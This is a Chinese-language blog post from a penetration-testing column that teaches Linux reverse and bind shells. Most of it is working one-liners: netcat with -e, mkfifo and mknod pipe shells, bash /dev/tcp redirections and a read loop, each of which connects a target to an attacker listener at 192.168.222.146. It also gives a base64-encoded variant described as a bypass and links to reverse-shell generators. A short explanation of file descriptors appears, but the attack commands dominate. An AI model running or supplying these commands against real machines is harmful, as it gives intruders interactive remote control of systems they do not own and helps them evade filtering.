Linux下的shell

最新推荐文章于 2024-06-12 10:23:54 发布
最新推荐文章于 2024-06-12 10:23:54 发布
阅读量1.1k 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux 运维 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/130512932
版权

NC反向shell

 1、查看shell类型

echo $SHELL

chsh -s 需要修改shell的类型

cat /etc/shells    查看存在哪些shell

然后反弹对应的shell(正向连接)

//被控制端
nc -lvvp 8989 -e /bin/bash
//控制端
nc 192.168.222.146(被控端ip) 8989

2、没有-e参数反弹shell

扩展了解标准文件描述符 0(输入) 、1(输出)、2(错误输出)的用法

Linux 文件描述符详解-腾讯云开发者社区-腾讯云

创建管道:

非root权限也可以

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.222.146 52010 > /tmp/f

root权限才可以

mknod backpipe p;nc 192.168.222.146 8978 0<backpipe | /bin/bash 1>backpipe 2> backpipe

Bash反弹shell

方法一:

被控端

bash -i >& /dev/tcp/192.168.222.146/34567 0>&1
bash -i > /dev/tcp/192.168.222.146/12345 0>&1 2>&1

&>与>&:都是将输出和报错输出到一个地方

0>&1:将标准输入作为标准输出给到远程地址,从而将输入的 权力给了192.168.222.146

2>&1:这里将错误作为输出,给到远程,这里就等于 >&

拓展:

/dev目录

/dev/tcp是Linux中的一个特殊设备,打开这个文件就相当发起了一个socket调用,建立一个socket连接

控制端

nc -lvvp 34567

方法二:

被控端

exec 5<>/dev/tcp/192.168.222.146/23456;cat <&5 | while read line; do $line 2>&5 >&5;done

控制端

nc -lvvp 23456

也可使用base64编码绕过:

bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xNDYvMzQ1NjcgMD4mMQ== | base64 -d| bash -i"

注意:这里监听端口尽量大一点(推荐大于10000),避免占用,方便连接到

github上有shell的集合,我在服务器上搭建了需要的可以使用Reverse Shell Generator

这是一个阉割版的,但感觉已经够用了。下面是完整改版PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
正向shell和反弹shell
weixin_45936149的博客
03-26 9166
正向shell反弹shell的利用场景以及使用技巧
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1373
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
最全Linux Shell详细教程
热门推荐
独旅天涯
07-12 1万+
若不存在,则创建一个文件,使用touch来创建,创建完成后离开;如果存在,判断该名称是否为文件,若为文件,则显示其行数;如果不是文件,则离开;我们在这里就在本地测试学习,因此我在这里先不建议大家这么着急去买服务器来学,这样比较费钱,等我们学好这些基础之后,再去上手服务器,那将是手到擒来。condition 一般为条件表达式,如果返回值为 false,则继续执行循环体内的语句,否则跳出循环。这里又到了最后了,补充一下printf跟echo命令是一样的作用,因此我就不演示了,统一用echo来输出。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2881
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
shell的正向和反向
qq_46258964的博客
02-05 8340
正向shell和反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
LinuxShell编程从入门到精通视频教程.txt
09-18
14、Linux下自动化运维企业案例.mp4 13、Linux系统增量备份脚本.mp4 12、Shell编程四剑客及案例详解.mp4 11、Shell编程之SED及GREP综合讲解.mp4 10、Linux下深入编程之函数及数组编程.mp4 09、Shell编程之函数及案例...
LinuxShell编程分享.ppt
04-07
Shell编程以及常用0基础运维脚本分享
LinuxShell编程
07-26
Shell是一种具备特殊功能的程序, 它是介于使用者和 UNIX/Linux 操作系统之核心程序(kernel)间的一个接口。 为了对用户屏蔽内核的复杂性,也为了保护内核以免用户误操作造成损害,在内核的周围建了一个外壳(shell)...
LinuxShell编程.ppt
12-07
Shell的简介以及Linux使用shell编程的指令及命令
Linuxshell连接金仓数据库(ksql)并完成查询、插入、修改表数据实例
07-15
Linux下连接金仓数据库(ksql)并完成查询、插入、修改表数据实例,修改后可用于oracle及mysql
linux正向连接shell_[经验] Linux 怎么连接 Xshell?
weixin_33701632的博客
12-24 370
(1) 首先, 你要先有一个可以正常运行的 Linux 系统, 当然一般情况下我们是把这个系统放在虚拟机里的, 我所使用的是ubuntu-18.04.2-live-server-amd64.iso(2) 在安装好并登陆上 Linux系统后, 就可以开始表演了1. 在命令行上输入  sudo apt-get install openssh-server  安装 ssh2. 在命令行上输入  sud...
linux正向连接shell_使用netcat的正向 / 反向shell
weixin_39947306的博客
12-24 1009
reverse shellbind shellreverse shell描述图:在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。先启动...
linux正向连接shell_Linux一句话反向shell原理
weixin_32467423的博客
12-24 2034
一、什么是反向shell就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。反向shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形,同时也实现了被控端的精准控制(指定了被控制端的IP,除此之外的是无法和被控端无法...
linux反弹shell总结
redwand的博客
02-22 1385
本文总结了Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
Linux反弹shell和正向连接
PP Jun的博客
10-02 656
Linux反弹shell和正向连接 正向连接:使用ssh命令是主机主动连接受目标机,通过这个连接本机可以主动的向目标机发送一些请求,这称为正向连接。(主机在内网,目标机器在外网) 反向连接:指目标机主动连接主机,通过这个目标机可以主动向主机发送一些请求。(主机在外网,目标机在内网) 此次实验中:CentOS为主机,Min为目标机 First of all,将两台虚拟机设置为仅主机模式 查看CentOS的IP Cent0S的IP为:192.168.79.128 将Min配置网络 Min的IP为:192
nc隧道技术
lyndon
12-23 1万+
使用场景: 客户端:嵌入式Linux网关 服务器:阿里云服务器 1、正向shell 客户端连接服务器,获取服务器的shell 服务器: [root@VM_0_14_centos ~]# mkfifo /tmp/fifo [root@VM_0_14_centos ~]# cat /tmp/fifo | /bin/bash -i 2&amp;gt;&amp;amp;1 | nc -l 10000 &amp;gt; /tmp/...
使用netcat的正向 / 反向shell
weixin_33720078的博客
01-08 1179
reverse shell bind shell reverse shell描述图: 在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用...
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 305
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
最新发布
appearappear的博客
06-12 253
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
linuxshell编程
03-16
Linux下的Shell编程是在Linux操作系统中使用Shell脚本语言进行编程的过程。Shell脚本语言是一种命令行脚本语言,常用来执行系统管理任务、自动化操作和编写脚本程序。常见的Shell类型有Bash、Zsh、Csh、Tcsh等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值